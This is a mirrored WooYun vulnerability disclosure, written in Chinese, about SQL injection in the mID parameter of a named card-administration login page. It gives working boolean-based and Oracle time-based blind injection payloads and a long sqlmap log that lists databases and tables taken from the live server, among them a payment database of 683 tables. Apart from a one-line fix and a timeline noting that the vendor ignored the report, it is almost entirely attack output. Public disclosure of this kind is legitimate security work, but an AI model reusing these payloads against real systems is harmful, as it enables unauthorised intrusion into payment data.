乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-03: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-11-17: 厂商已经主动忽略漏洞,细节向公众公开
通过改变命令参数可以对其进行更深入的攻击。
https://www.cardadministration.com/login.jsp?mID=PCC 存在注入漏洞https://www.cardadministration.com/login.jsp?mID=PCC%27%20AND%204950=4950%20AND%20%27EWau%27=%27EWau
Parameter: mID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: mID=PCC' AND 4950=4950 AND 'EWau'='EWau Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: mID=PCC' AND 1434=DBMS_PIPE.RECEIVE_MESSAGE(CHR(102)||CHR(68)||CHR(67)||CHR(90),5) AND 'oNsE'='oNsE
时间关系只扫描部分库
Database: MDSYS[36 tables]+--------------------------------+| OGIS_GEOMETRY_COLUMNS || OGIS_SPATIAL_REFERENCE_SYSTEMS || SDO_COORD_AXES || SDO_COORD_AXIS_NAMES || SDO_COORD_OPS || SDO_COORD_OP_METHODS || SDO_COORD_OP_PARAMS || SDO_COORD_OP_PARAM_USE || SDO_COORD_OP_PARAM_VALS || SDO_COORD_OP_PATHS || SDO_COORD_REF_SYS || SDO_COORD_SYS || SDO_CS_SRS || SDO_DATUMS || SDO_DATUMS_OLD_SNAPSHOT || SDO_ELLIPSOIDS || SDO_ELLIPSOIDS_OLD_SNAPSHOT || SDO_GEOR_PLUGIN_REGISTRY || SDO_GEOR_XMLSCHEMA_TABLE || SDO_GR_MOSAIC_0 || SDO_GR_MOSAIC_1 || SDO_GR_MOSAIC_2 || SDO_GR_MOSAIC_3 || SDO_GR_RDT_1 || SDO_PREFERRED_OPS_SYSTEM || SDO_PREFERRED_OPS_USER || SDO_PRIME_MERIDIANS || SDO_PROJECTIONS_OLD_SNAPSHOT || SDO_TOPO_DATA$ || SDO_TOPO_RELATION_DATA || SDO_TOPO_TRANSACT_DATA || SDO_TXN_IDX_DELETES || SDO_TXN_IDX_EXP_UPD_RGN || SDO_TXN_IDX_INSERTS || SDO_UNITS_OF_MEASURE || SDO_XML_SCHEMAS |+--------------------------------+
Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: mID=PCC' AND 4814=4814 AND 'XZzZ'='XZzZ Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: mID=PCC' AND 1434=DBMS_PIPE.RECEIVE_MESSAGE(CHR(102)||CHR(68)||CHR(67)||CHR(90),5) AND 'oNsE'='oNsE
和部分表
CTXSYS[11:16:16] [INFO] retrieved: EXFSYS[11:17:10] [INFO] retrieved: MDSYS[11:18:02] [INFO] retrieved: OLAPSYhttp://202.77.166.191/eng/index.php?id=1S[11:19:12] [INFO] retrieved: PAYWARE[11:20:18] [INFO] retrieved: SYS[11:20:57] [INFO] retrieved: SYSTEM[11:22:05] [INFO] retrieved: WMSYS[11:22:59] [INFO] fetching tables for databases: 'CTXSYS, EXFSYS, MDSYS, OLAPSYS, PAYWARE, SYS, SYSTEM, WMSYS'[11:22:59] [INFO] fetching number of tables for database 'SYS'[11:22:59] [INFO] retrieved: 31[11:23:15] [INFO] retrieved: DUAL[11:24:00] [INFO] retrieved: SYSTEM_PRIVILEGE[11:27:08] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request_MAP[11:27:40] [INFO] retrieved: TABLE_PRIVILEGE_MAP[11:32:07] [INFO] retrieved: STMT_AUDIT_OPT[11:35:36] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the requestION_MAP[11:37:59] [INFO] retrieved: AUDIT_ACTIONS[11:41:51] [INFO] retrieved: AW$AWMD[11:43:47] [INFO] retrieved: AW$AWCREATE[11:45:22] [INFO] retrieved: OLAPI_SESSION_HISTORY[11:49:27] [INFO] retrieved: OLAPI_IFACE_OBJECT_HISTORY[11:53:14] [INFO] retrieved: OLAP_OLEDB_KEYWORDS[11:55:25] [INFO] retrieved: OLAP_OLEDB_MDPROPVALS[11:57:50] [INFO] retrieved: OLAP_OLEDB_MDPROPS[11:58:25] [INFO] retrieved: OLAP_OLEDB_FUNCTIONS_PVT[12:01:51] [INFO] retrieved: OLAPI_HISTORY[12:03:30] [INFO] retrieved: OLAPI_MEMORY_HEAP_HISTORY[12:07:25] [INFO] retrieved: AW$AWXML[12:09:00] [INFO] retrieved: OLAPI_IFACE_OP_HISTORY[12:12:31] [INFO] retrieved: OLAPI_MEMOR[12:13:55] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the requestY_OP_[12:15:14] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the requestHISTORY[12:16:21] [INFO] retrieved: AW$EXPRESS[12:17:51] [INFO] retrieved: AW$AWCREATE10G[12:19:30] [INFO] retrieved: AW$AWREPORT[12:20:41] [INFO] retrieved: SDO_GEOR_XMLSCHEMA_[12:25:08] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the requestTABLE[12:25:47] [INFO] retrieved: ODCI_SECOBJ$[12:27:39] [INFO] retrieved: ODCI_WARNINGS$[12:29:43] [INFO] retrieved: OLAPTABLEVELTUPLES[12:32:32] [INFO] retrieved: OLAPTABLEVELS[12:33:03] [INFO] retrieved: PSTUBTBL[12:34:25] [INFO] retrieved: KU$NOEXP_TAB[12:36:12] [INFO] retrieved: PLAN_TABLE$[12:38:58] [INFO] retrieved: IMPDP_STATS[12:40:51] [INFO] retrieved: WRI$_ADV_ASA_RECO_DATA[12:43:59] [INFO] fetching number of tables for database 'OLAPSYS'[12:43:59] [INFO] retrieved: 9[12:44:07] [INFO] retrieved: XML_LOAD_RECORDS[12:47:54] [INFO] retrieved: XML_LOAD_LOG[12:49:03] [INFO] retrieved: OLAP_SESSION_CUBES[12:52:08] [INFO] retrieved: OLAP_SESSION_[12:53:09] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the requestDIMS[12:54:21] [INFO] retrieved: CWM2$AWCUBECREATEACCESS[12:57:59] [INFO] retrieved: CWM2$AWDIMCREATEACCESS[13:00:43] [INFO] retrieved: CWM2$_TEMP_VALUES[13:02:14] [INFO] retrieved: CWM2$_AW_TEMP_CUST_MEAS_MAP[13:04:25] [INFO] retrieved: CWM2$_AW_NEXT_TEMP[13:06:13] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request_CUST_MEA[13:07:36] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the requestS[13:07:49] [INFO] fetching number of tables for database 'SYSTEM'[13:07:49] [INFO] resumed: 8[13:07:49] [INFO] resumed: DEF$_TEMP$LOB[13:07:49] [INFO] resumed: HELP[13:07:49] [INFO] resumed: MVIEW$_ADV_INDEX[13:07:49] [INFO] resumed: MVIEW$_ADV_PARTITION[13:07:49] [INFO] resumed: MVIEW$_ADV_OWB[13:07:49] [INFO] resumed: OL$NODES[13:07:49] [INFO] resumed: OL$HINTS[13:07:49] [INFO] resumed: OL$[13:07:49] [INFO] fetching number of tables for database 'EXFSYS'[13:07:49] [INFO] retrieved: 1[13:08:00] [INFO] retrieved: RLM$PARSEDCOND[13:10:20] [INFO] fetching number of tables for database 'MDSYS'[13:10:20] [INFO] retrieved: 36[13:10:35] [INFO] retrieved: OGIS_SPATIAL_REFERENCE_SYSTEMS[13:13:51] [INFO] retrieved: OGIS_GEOMETRY_COLUMNS[13:15:39] [INFO] retrieved: SDO_UNITS_OF_[13:17:35] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the requestMEASURE[13:18:20] [INFO] retrieved: SDO_P[13:19:05] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the requestRIME_MERIDIANS[13:21:19] [INFO] retrieved: SDO_ELLIPSOIDS[13:22:18] [INFO] retrieved: SDO_DATUMS[13:22:59] [INFO] retrieved: SDO_COORD_SYS[13:24:09] [INFO] retrieved: SDO_COORD_AXIS_NAMES[13:25:33] [INFO] retrieved: SDO_COORD_AXES[13:26:00] [INFO] retrieved: SDO_COORD_REF_SYS[13:26:56] [INFO] retrieved: SDO_COORD_OP_METHODS[13:28:28] [INFO] retrieved: SDO_COORD_OPS[13:30:07] [INFO] retrieved: SDO_PREFERRED_OPS_SYSTEM[13:32:52] [INFO] retrieved: SDO_PREFERRED_OPS_USER[13:33:44] [INFO] retrieved: SDO_COORD_OP_PATHS[13:35:13] [INFO] retrieved: SDO_COORD_OP_PARAMS[13:35:53] [INFO] retrieved: SDO_COORD_OP_PARAM_USE[13:36:41] [INFO] retrieved: SDO_COORD_OP_PARAM_VALS[13:37:22] [INFO] retrieved: SDO_XML_SCHEMAS[13:38:59] [INFO] retrieved: SDO_CS_SRS[13:39:52] [INFO] retrieved: SDO_PROJECTIONS_OLD_SNAPSHOT[13:43:02] [INFO] retrieved: SDO_ELLIPSOIDS_OLD_SNAPSHOT[13:45:46] [INFO] retrieved: SDO_DATUMS_OLD_SNAPSHOT[13:47:51] [INFO] retrieved: SDO_GEOR_XMLSCHEMA_TABLE[13:50:41] [INFO] retrieved: SDO_GEOR_PLUGIN_REGISTRY[13:52:38] [INFO] retrieved: SDO_TXN_IDX_EXP_UPD_RGN[13:54:56] [INFO] retrieved: SDO_TXN_IDX_DELETES[13:56:30] [INFO] retrieved: SDO_TXN_IDX_INSERTS[13:57:42] [INFO] retrieved: SDO_GR_RDT_1[13:59:00] [INFO] retrieved: SDO_GR_MOSAIC_3[14:00:20] [INFO] retrieved: SDO_GR_MOSAIC_2[14:00:53] [INFO] retrieved: SDO_GR_MOSAIC_1[14:01:33] [INFO] retrieved: SDO_GR_MOSAIC_0[14:02:21] [INFO] retrieved: SDO_TOPO_DATA$[14:03:48] [INFO] retrieved: SDO_TOPO_RELATION_DATA[14:06:11] [INFO] retrieved: SDO_TOPO_TRANSACT_DATA[14:08:25] [INFO] fetching number of tables for database 'PAYWARE'[14:08:25] [INFO] retrieved: 683[14:08:47] [INFO] retrieved: VA_LOYALTY_DAILY_TXN_20141113[14:13:45] [INFO] retrieved: VA_SPEND_INCENTIVE_D[14:16:50] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the requestET[14:17:03] [INFO] retrieved: VA_ESPN_ITP_EXCEPTION
ID参数进行检查并且进行过滤
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)
